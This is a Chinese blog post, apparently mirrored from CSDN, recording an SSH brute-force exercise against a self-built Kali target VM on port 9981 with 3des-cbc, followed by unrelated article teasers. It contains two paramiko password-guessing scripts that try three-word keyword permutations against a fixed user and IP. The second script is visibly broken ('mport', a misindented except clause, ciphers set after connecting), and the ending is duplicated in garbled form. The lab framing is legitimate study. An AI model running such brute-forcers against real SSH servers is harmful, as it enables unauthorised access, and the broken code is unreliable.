自搭靶机实现SSH爆破复现记录

news2024/12/27 22:37:11

编写脚本实现ssh爆破。可使用paramiko、pexpect、pxssh等Python模块进行编写。但在ssh服务端将配置加密方式为非常用加密方式3des-cbc,端口为9981端口。

创建 了一个新的Kali虚拟机作为靶机,使用原本的Kali作为攻击机。

image-20240828192346167

设置一个用户为target1234,用户密码为targetpasswd123。

root用户为kaliTarget:

登录进去后查看靶机的IP地址:

image-20240828223122612

相同方法获取攻击机IP:

最后获得攻击机IP:192.168.91.130

靶机IP:192.168.91.129

调节靶机ssh服务端口为9981,加密方式为非常用加密方式3des-cbc,允许root用户通过密码登录:

image-20240828232315661

重启ssh服务:

image-20240828231038300

使用本地连接测试一下有没有设置成功:

image-20240829110901198

链接成功,说明配置生效了。

OK,断开连接:

image-20240829111411416

到这里做好了靶机的准备工作,我们接下来去攻击机上实现ssh攻击:

先使用nmap扫描靶机开放的端口:

image-20240829111954179

发现未扫描到可用端口,加大端口扫描范围:

扫描到9981端口开放:

image-20240829112121611

接下来我们去设置字典方便ssh爆破操作:

初始我们认为靶机密码为5到15位,包含大小写字符和数字。

计算得组合可能为781,514,782,079,074,318,841,757,344种,需要消耗极大的计算资源,所以我们需要继续配置字典策略。

介于密码一般长度,我们设置一组常用字典,包含常用组合和数字,然后组合三次,预计对于n组关键字的字典,能产生n3种密码。

获取关键字:设定场景我们已知靶机账户名,从账户名中获得关键字target,Target,Kali,kali,结合常见字段获得字典。

截图示例(设置字典):

image-20240829132417941

在Kali上安装paramiko模块,截图显示kali上已经存在了该模块,路径为/usr/lib/python3/dist-packages (3.4.0)

书写脚本:

image-20240829171545969

脚本设计策略:选择一组高频关键词词典,使用itertools.permutations 函数完成每三个关键词之间的全排列:

脚本内容:

import paramiko
import socket
from itertools import permutations 

def ssh_brute_force(target_ip, port, username, password_combinations):
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    
    for password in password_combinations:
        try:
            password_str = ''.join(password)
            print(f"[*] Trying: {username}:{password_str}")
            client.connect(target_ip, port=port, username=username, password=password_str, 
                           look_for_keys=False, allow_agent=False,
                           ciphers=["3des-cbc"])  # 指定使用3des-cbc加密方式
            print(f"[+] Success! Username: {username} Password: {password_str}")
            return True
        except paramiko.AuthenticationException:
            print("[-] Authentication failed.")
        except socket.error as e:
            print(f"[!] Connection failed: {e}")
        except paramiko.SSHException as e:
            print(f"[!] SSH Error: {e}")
    
    return False

# 读取文件中的关键词
password_file = 'passwords.txt'
with open(password_file, 'r') as file:
    keywords = file.read().splitlines()

# 生成每三个关键词的全排列组合
password_combinations = list(permutations(keywords, 3))

target_ip = '192.168.91.129'
port = 9981
username = 'target1234'

# 开始暴力破解
ssh_brute_force(target_ip, port, username, password_combinations)

运行脚本:

image-20240829174253916

报错显示paramikoSSHClient.connect() 方法中不接受 ciphers 作为参数

在建立SSH连接时,先通过 paramiko.Transport 设置允许的加密算法,再通过 Transport 对象连接SSH。

代码:

mport paramiko
import socket
from itertools import permutations

def ssh_brute_force(target_ip, port, username, password_combinations):
    for password in password_combinations:
        try:
            password_str = ''.join(password)
            print(f"[*] Trying: {username}:{password_str}")

            # 创建Transport对象并指定加密算法
            transport = paramiko.Transport((target_ip, port))
            transport.connect(username=username, password=password_str)
            transport.get_security_options().ciphers = ['3des-cbc']

            # 建立SSH连接
            client = paramiko.SSHClient()
            client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
            client._transport = transport

            print(f"[+] Success! Username: {username} Password: {password_str}")
            transport.close()
            return True
        except paramiko.AuthenticationException:
            print("[-] Authentication failed.")
        except socket.error as e:
            print(f"[!] Connection failed: {e}")
                    except paramiko.SSHException as e:
            print(f"[!] SSH Error: {e}")
        finally:
            transport.close()
    
    return False


# 读取文件中的关键词
password_file = '/home/f34301/dictionry.txt'
with open(password_file, 'r') as file:
    keywords = file.read().splitlines()

# 生成每三个关键词的全排列组合
password_combinations = list(permutations(keywords, 3))

target_ip = '192.168.91.129'
port = 9981
username = 'target1234'

# 开始暴力破解
ssh_brute_force(target_ip, port, username, password_combinations)


修改脚本并运行:

image-20240829174724333

可以看到运行成功开始尝试了。

等待代码运行。

image-20240829182820427

最后看到通过我们不懈的努力,终于攻击成功了。

ame, password_combinations)




修改脚本并运行:

[外链图片转存中...(img-8jiW3QEx-1725173392168)]

可以看到运行成功开始尝试了。

等待代码运行。

[外链图片转存中...(img-Wgi80inT-1725173392168)]

最后看到通过我们不懈的努力,终于攻击成功了。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2096638.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

数学建模强化宝典(5)整数规划

前言 整数规划是数学规划中的一种特殊类型,它要求决策变量的取值必须是整数。这种规划问题在实际应用中非常普遍,因为很多决策问题(如生产数量、人员分配、车辆调度等)的解都必须是整数。整数规划可以分为几类,主要包括…

07:【江科大stm32】:编码器通过定时器测速

编码器通过定时器测速 编码器的转动方向不同,则输出波形的相位也不同。如下图所示: 编码器标准库的编程接口: ①Encoder.c文件的代码如下: #include "stm32f10x.h" // Device header//使用PA6&…

黑马-Cloud21版-实用篇05:分布式搜索引擎02:DSL查询文档、搜索结果处理、RestClient查询文档、黑马旅游案例

分布式搜索引擎02 在昨天的学习中,我们已经导入了大量数据到elasticsearch中,实现了elasticsearch的数据存储功能。但elasticsearch最擅长的还是搜索和数据分析。 所以今天,我们研究下elasticsearch的数据搜索功能。我们会分别使用DSL和Res…

[Linux]:基本指令(上)

✨✨ 欢迎大家来到贝蒂大讲堂✨✨ 🎈🎈养成好习惯,先赞后看哦~🎈🎈 所属专栏:Linux学习 贝蒂的主页:Betty’s blog 与Windows环境不同,我们在linux环境下需要通过指令进行各操作&…

PHP8、ThinkPHP8框架中间的应用教程详解

前言 虽然PHP的落幕的话题一直不绝,但是实际在WEB端项目中PHP占有率达到了70%以上,一直在WEB一枝独秀,它以快速、高效的开发闻名,出圈了几十年,等待只是下一次的涅槃。而经过PHP8、PHP9的演变发展,PHP逐渐…

微软最新轻量级、多模态Phi-3.5-vision-instruct模型部署

Phi-3.5-vision-instruct是微软最新发布的 Phi-3.5 系列中的一个AI模型,专注于多模态任务处理,尤其是视觉推理方面的能力。 Phi-3.5-vision-instruct模型具备广泛的图像理解、光学字符识别(OCR)、图表和表格解析、多图像或视频剪…

【STM32】通用定时器TIM(输入捕获)

本篇博客重点在于标准库函数的理解与使用,搭建一个框架便于快速开发 目录 前言 输入捕获简介 输入捕获配置 初始化IO口 输入捕获初始化 选择触发源及从模式 测量频率方法 输入捕获代码 IC.h IC.c 输入捕获测占空比 前言 建议先阅读这篇博客&#xf…

Open3D mesh 均值滤波

Open3D点云算法汇总及实战案例汇总的目录地址: Open3D点云算法与点云深度学习案例汇总(长期更新)-CSDN博客 一、概述 均值滤波(Mean Filtering)是一种基本的网格平滑技术,通过将每个顶点的位置替换为其邻域…

[ABC369C] Count Arithmetic Subarrays

首先看了下题意 大致题意就是让你在长度为的序列找出所有的等差数列。 -----------------------------------------------------------------------------------------我是分界线 我的思路了,就是先从2开始计算等差数列,从3开始判断,如果是…

C#从入门到精通(21)—Mutex互斥锁在多线程、多进程下的使用

前些天发现了一个巨牛的人工智能学习网站,通俗易懂,风趣幽默,忍不住分享一下给大家!人工智能学习网站 前言: 大家好,我是上位机马工,硕士毕业4年年入40万,目前在一家自动化公司担任…

C语言调用子函数时入/出栈(保护/恢复现场)全过程分析:以Cortex-M3为例

0 参考资料&工具 Cortex M3权威指南(中文).pdf keil5(用于仿真查看寄存器、栈变化)1 C语言调用子函数时出入/出栈(保护/恢复现场)全过程分析 使用C语言调用子函数是如何保护/恢复现场的呢?本文以Cortex-M3为例&a…

Zynq之IIC使用示例

前言 明确设计思路,精准定位问题,对于我们后期理解迭代工程有很大的帮助。 这就是我们常说的40%设计,20%编写和剩下的40%时间进行调试优化。 今天为大家带来的是Zynq-PS端的IIC使用demo,通过驱动外设DS1337来强化对IIC的使用方…

【C++二分查找 贪心】1552. 两球之间的磁力

本文涉及的基础知识点 C二分查找 贪心:决策兼容性 LeetCode1552. 两球之间的磁力 在代号为 C-137 的地球上,Rick 发现如果他将两个球放在他新发明的篮子里,它们之间会形成特殊形式的磁力。Rick 有 n 个空的篮子,第 i 个篮子的位…

百日草花语探秘:天长地久的情感寄托与丰富内涵解析

百日草宛如一颗璀璨的明珠,散发着独特的魅力。它那鲜艳夺目的花朵,仿佛是大自然用最细腻的笔触勾勒而成,每一朵都蕴含着无尽的奥秘与情感。当我们漫步于花海之间,不经意间与百日草相遇,那绚烂的色彩和别致的形态定会让…

李沐动手学深度学习:树叶分类竞赛

视频地址:30 第二部分完结竞赛:图片分类【动手学深度学习v2】 竞赛地址:https://www.kaggle.com/competitions/classify-leaves !nvidia-smi # 查看 GPU 信息 # !lscpu # 查看 CPU 信息 # !free -h # 查看内存(RAM) 信息 # !p…

datax编译:解决datax不支持MongoDB 6.0.10的问题

1. 需求及问题 最近使用datax同步MongoDB中的数据到hive,使用了mongodbreader和hdfswriter插件。MongoDB的版本是6.0.10,而datax的默认编译安装包中mongodbreader插件不支持MongoDB 6.0.10。 DataX工具介绍数据同步工具之DataX-CSDN博客 官方地址 https://github.com/alib…

模型 U型思考法(深度思考)

系列文章 分享 模型,了解更多👉 模型_思维模型目录。探索本质,创新求解。 1 U型思考法的应用 1.1 小罐茶的品牌创新 背景: 小罐茶作为一家新兴的茶叶品牌,面临着传统茶叶市场的激烈竞争和消费者需求的多样化。为了在…

地震模板代码 - 第三部分

Seismic stencil codes - part 3 — ROCm Blogs (amd.com) 2024年8月12日,作者:Justin Chang 和 Ossian O’Reilly。 在前两篇博客文章中,我们开发了一个 HIP 内核,能够计算地震波传播中常用的高阶有限差分。经过优化后&#xf…

Redis KEY操作实战手册:从设计到维护的全面指南

​ 🌈 个人主页:danci_ 🔥 系列专栏:《设计模式》《MYSQL》 💪🏻 制定明确可量化的目标,坚持默默的做事。 ✨欢迎加入探索Redis的key的相关操作之旅✨ 👋 大家好!文本…

在 Ubuntu 环境下使用 VSCode 和 PlatformIO 下载程序到 Arduino Uno

安装 VSCode 访问 VSCode 官网 下载 .deb 包使用以下命令安装&#xff1a;sudo dpkg -i <下载的文件名>.deb sudo apt-get install -f安装 PlatformIO 扩展 在 VSCode 中&#xff0c;转到扩展市场&#xff08;CtrlShiftX&#xff09;搜索 “PlatformIO IDE”点击 “安装”…